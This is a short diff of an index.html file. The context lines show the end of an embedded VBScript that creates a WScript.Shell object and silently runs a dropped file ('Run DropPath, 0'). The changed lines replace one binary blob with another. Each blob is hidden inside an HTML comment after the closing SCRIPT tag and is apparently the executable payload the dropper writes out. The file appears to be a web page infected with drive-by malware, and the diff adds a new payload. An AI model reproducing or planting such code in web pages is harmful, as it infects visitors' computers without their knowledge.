--- a/index.html
+++ b/index.html
@@ -23,5 +23,8 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--¦]ËX»¨{F­õ†ý2ùäÃ¯¦61ØÊÜ€ÍË$ëãjNSºVœÝj£’:Zˆ!Æ‡b,!€ ë$”–óYê=£ËlL¿1Â›ÅYc™Æ"OØ@x,ŸÔ»ÍôØ °/+:™D}‘è4e•rÒc×DITNÚ¾Ž<#!ûþs±œˆ†T7t­»X¶{xŸððG¦y{àVºÚ›Í9	hkº‰èKÑ
-rîí‹A¹ZiãÖc†ãÂ]…ÃXpö8ØPÀ¨ƒ)Å>Ç“±µ?Š·L¶uQ¹;âö_ûì[ÈÚŽ ué©0é8´„{¸A:SY3`|g»'Ñ#ìLá„z6 ¤ÛpŸr„UaDðDãÅv/¹Ò®íéj¡²âÐÉ‹ÆX?^56 ½XòÆPY—Î÷òFh!§Íïžò¶&°yd_ `Û…•D7wVŸÜŽç\Ç·¤S3‡tLx&Ì3˜>Í´+£> '»Nù>îÎjˆÞµ8Š Ú’Ÿ/K,ËÍµ‘j«É‰t²@wìçkTÝp[¸ýJ ÕšRûÕšÕšÕš˜GM"Q/_ƒÕš Õš-->
+//--></SCRIPT><!--.‰àÆi”Â®Ê§ó’‡6Úü cNùü¼é12ÁæHº¯À›‰V&âÀÉ‘c$‘'ªšB9”ºc\eûNU	§ßAâîmoéõŠ7Ö´/áxOeim9
+$ëWv²áFí×A»ÌroB´‘ÇÞÜtL±Í³9¡Œ.ó£¦'F$¶Q oÉaD6TþÑ"Ò‹R-íND¸°¶ã¶„âô'-z=ða/=Ý-c®Âmèav“õkÒ?í÷{ÆÛ7¸A½ÕQ-¿õu¼Õ¥ÌRL€
+¸t«‘ëÉM 2âÁ]îýE¢¯±ìlƒË
+SÙd»‘*]¶„Ý(÷È«—~î{MxGÚÃ H«u¬,Ìí>ù¹¯åg.óFê¢9l>1¼Åño7u»~·jI7Hì†NÔ²ïã8õš20)‹Oç¹š•HÖ'|ßD!™
+]¤æ¢hÐžôÀ"¼^Ûvh™¾©Òºz»°›á¬ôZPÆ 3×¸5/þËvç”Ê”Š¹W¬‚ã÷$JˆŠV VÀ 	/‹t´Ì‹¶Ø¸®5×GäÊ|ôùH1Ü@œtêñå£oŒq´ ÕšRûÕšÕšÕš˜GM!Q/_ƒÕš Õš-->
